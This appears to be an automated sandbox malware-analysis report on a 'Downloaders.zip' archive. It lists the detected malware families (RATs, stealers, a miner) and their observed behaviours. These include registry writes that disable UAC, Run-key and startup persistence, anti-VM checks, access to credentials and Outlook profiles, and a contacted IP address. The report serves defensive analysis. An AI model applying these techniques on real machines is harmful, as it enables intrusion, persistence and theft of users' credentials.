Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
Asyncrat family
Lokibot family
Xmrig family
Quasar family
Detect Socks5Systemz Payload
Xred family
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm family
Quasar payload
XMRig Miner payload
Redline family
Xworm
Quasar RAT
Sectoprat family
Xred
RedLine payload
Socks5systemz family
Socks5Systemz
Process spawned unexpected child process
Lokibot
Contains code to disable Windows Defender
AsyncRat
RedLine
SectopRAT
SectopRAT payload
UAC bypass
StormKitty payload
Suspicious use of NtCreateProcessExOtherParentProcess
StormKitty
xmrig
Detect Xworm Payload
Stormkitty family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Async RAT payload
Command and Scripting Interpreter: PowerShell
Sets service image path in registry
Sets file to hidden
Indicator Removal: Network Share Connection Removal
Creates new service(s)
Contacts a large (1989) amount of remote hosts
Downloads MZ/PE file
Blocklisted process makes network request
Stops running service(s)
Checks BIOS information in registry
Executes dropped EXE
Themida packer
Identifies Wine through registry keys
Loads dropped DLL
ACProtect 1.3x - 1.4x DLL software
Drops startup file
Checks computer location settings
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Reads data files stored by FTP clients
Unsecured Credentials: Credentials In Files
Reads WinSCP keys stored on the system
Unexpected DNS network traffic destination
Adds Run key to start application
Checks whether UAC is enabled
Checks installed software on the system
Network Share Discovery
Enumerates connected drives
Accesses Microsoft Outlook profiles
Network Service Discovery
Accesses cryptocurrency files/wallets, possible credential harvesting
Legitimate hosting services abused for malware hosting/C2
Indicator Removal: File Deletion
Power Settings
Suspicious use of NtSetInformationThreadHideFromDebugger
UPX packed file
Drops file in System32 directory
Enumerates processes with tasklist
AutoIT Executable
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Drops file in Windows directory
Unsigned PE
System Location Discovery: System Language Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Access Token Manipulation: Create Process with Token
Detects Pyinstaller
Event Triggered Execution: Netsh Helper DLL
Program crash
Command and Scripting Interpreter: JavaScript
Embeds OpenSSL
Browser Information Discovery
System Network Configuration Discovery: Wi-Fi Discovery
NSIS installer
Suspicious behavior: GetForegroundWindowSpam
NTFS ADS
Suspicious use of SendNotifyMessage
Runs net.exe
outlook_office_path
Delays execution with timeout.exe
Views/modifies file attributes
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Opens file in notepad (likely ransom note)
Modifies data under HKEY_USERS
Modifies registry class
Runs ping.exe
Enumerates system info in registry
Discovers systems in the same network
outlook_win_path
Detects videocard installed
Checks SCSI registry key(s)
Checks processor information in registry
Scheduled Task/Job: Scheduled Task
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-27 00:33
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-27 00:33
Reported
2024-11-27 00:45
Platform
win10ltsc2021-20241023-en
Max time kernel
646s
Max time network
711s
Command Line
Signatures
AsyncRat
Asyncrat family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Socks5Systemz Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Lokibot
Lokibot family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbem\wmiprvse.exe |
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socks5Systemz
Socks5systemz family
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stormkitty family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 9180 created 7352 | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif |
| PID 1244 created 9288 | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\217412\Possibly.pif |
| PID 9116 created 2556 | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\29442\Reynolds.com |
Suspicious use of NtCreateUserProcessOtherParentProcess
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xmrig family
Xred
Xred family
Xworm
Xworm family
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\Files\Client_protected.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\a\rh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Desktop\a\L.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Command and Scripting Interpreter: PowerShell
Contacts a large (1989) amount of remote hosts
Creates new service(s)
Downloads MZ/PE file
Indicator Removal: Network Share Connection Removal
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files (x86)\\Mesh Agent\\MeshAgent.exe\" " | C:\Users\Admin\AppData\Roaming\MSIX\meshagent32-group.exe | N/A |
Stops running service(s)
ACProtect 1.3x - 1.4x DLL software
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\Files\Client_protected.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\LB31.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Mig\Mig.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\a\L.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\Files\Client_protected.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\a\rh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Desktop\a\rh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\LB31.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Mig\Mig.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Desktop\a\L.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\SYSTEM32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\taskhost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\AV_DOW~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\._cache_System.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\IMG001.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\OneDrive.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\frap.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\447331\Buyer.pif | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\0fVlNye.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\Opdxdyeul.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\PctOccurred.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\System.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\ConsiderableWinners.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\9758xBqgE1azKnB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\PharmaciesDetection.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Files\av_downloader1.1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\a\caspol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\iazsfn.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url | C:\Windows\system32\taskmgr.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\Desktop\Files\._cache_System.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk | C:\Users\Admin\Desktop\Files\._cache_System.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk | C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk | C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9758xBqgE1azKnB.lnk | C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url | C:\Windows\SYSTEM32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url | C:\Windows\SYSTEM32\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Wine | C:\Users\Admin\Desktop\a\rh.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Wine | C:\Users\Admin\Desktop\a\L.exe | N/A |
Loads dropped DLL
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 45.155.250.90 | N/A | N/A |
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\a\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\v7wa24td.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\v7wa24td.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\v7wa24td.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\v7wa24td.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\Desktop\a\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\Desktop\a\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\v7wa24td.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\v7wa24td.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\v7wa24td.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\v7wa24td.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\Desktop\Files\v7wa24td.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyApp = "\"C:\\Users\\Admin\\Desktop\\Files\\WindowsUI.exe\"" | C:\Users\Admin\Desktop\Files\WindowsUI.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9758xBqgE1azKnB = "C:\\Users\\Admin\\AppData\\Roaming\\9758xBqgE1azKnB.exe" | C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Desktop\a\x4lburt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" | C:\Users\Admin\Desktop\Files\System.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" | C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\OneDrive.exe" | C:\Users\Admin\AppData\Local\Temp\tuwhzy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bwapp = "C:\\Users\\Admin\\Desktop\\Files\\bwapp.exe" | C:\Users\Admin\Desktop\Files\bwapp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\2728A9395B252838420810\\2728A9395B252838420810.exe" | C:\Users\Admin\Desktop\Files\Sniffthem.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\2728A9395B252838420810\\2728A9395B252838420810.exe" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe" | C:\Users\Admin\Desktop\a\win.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Yjlwuuys = "C:\\Users\\Admin\\AppData\\Roaming\\Yjlwuuys.exe" | C:\Users\Admin\Desktop\Files\Opdxdyeul.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\documents\\OneDrive.exe" | C:\Users\Admin\Desktop\Files\OneDrive.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\2728A9395B252838420810\\2728A9395B252838420810.exe" | C:\Windows\system32\audiodg.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Desktop\Files\Client_protected.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\arp.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ARP.EXE | N/A |
Network Share Discovery
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Tasks\UAC | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\comctl32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\dll\ws2_32.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\symbols\dll\wrpcrt4.pdb | C:\Program Files (x86)\Mesh Agent\MeshAgent.exe | N/A |
